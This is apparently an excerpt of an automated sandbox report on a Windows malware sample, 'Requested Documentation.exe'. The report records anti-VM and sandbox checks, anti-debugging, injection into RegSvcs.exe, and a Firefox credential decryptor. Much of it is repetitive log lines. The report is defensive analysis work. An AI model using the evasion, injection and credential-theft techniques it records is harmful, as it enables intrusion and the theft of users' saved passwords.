                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTR
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\Desktop\Requested Documentation.exeAPI/Special instruction interceptor: Address: 1303214
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: Requested Documentation.exe, 00000000.00000002.1739508199.0000000001348000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEORZ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598483Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598332Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598023Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595758Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595592Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595264Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7837Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2006Jump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105539
                  Source: C:\Users\user\Desktop\Requested Documentation.exeAPI coverage: 4.8 %
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009E445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_009E445A
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EC6D1 FindFirstFileW,FindClose,0_2_009EC6D1
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_009EC75C
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009EEF95
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009EF0F2
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009EF3F3
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009E37EF
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009E3B12
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009EBCBC
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009849A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598483Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598332Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598023Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595758Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595592Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595264Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
                  Source: RegSvcs.exe, 00000001.00000002.4192913744.000000000116D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Requested Documentation.exeAPI call chain: ExitProcess graph end nodegraph_0-103779
                  Source: C:\Users\user\Desktop\Requested Documentation.exeAPI call chain: ExitProcess graph end nodegraph_0-103986
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_05EE6328 LdrInitializeThunk,1_2_05EE6328
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009F3F09 BlockInput,0_2_009F3F09
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_00983B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00983B3A
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009B5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_009B5A7C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_00984B37 LoadLibraryA,GetProcAddress,0_2_00984B37
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_01303480 mov eax, dword ptr fs:[00000030h]0_2_01303480
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_013034E0 mov eax, dword ptr fs:[00000030h]0_2_013034E0
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_01301E70 mov eax, dword ptr fs:[00000030h]0_2_01301E70
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009D80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_009D80A9
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009AA124 SetUnhandledExceptionFilter,0_2_009AA124
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009AA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009AA155
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040E61C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00416F6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004123F1 SetUnhandledExceptionFilter,1_2_004123F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\Requested Documentation.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\Requested Documentation.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E66008Jump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009D87B1 LogonUserW,0_2_009D87B1
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_00983B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00983B3A
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_009848D7
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009E4C27 mouse_event,0_2_009E4C27
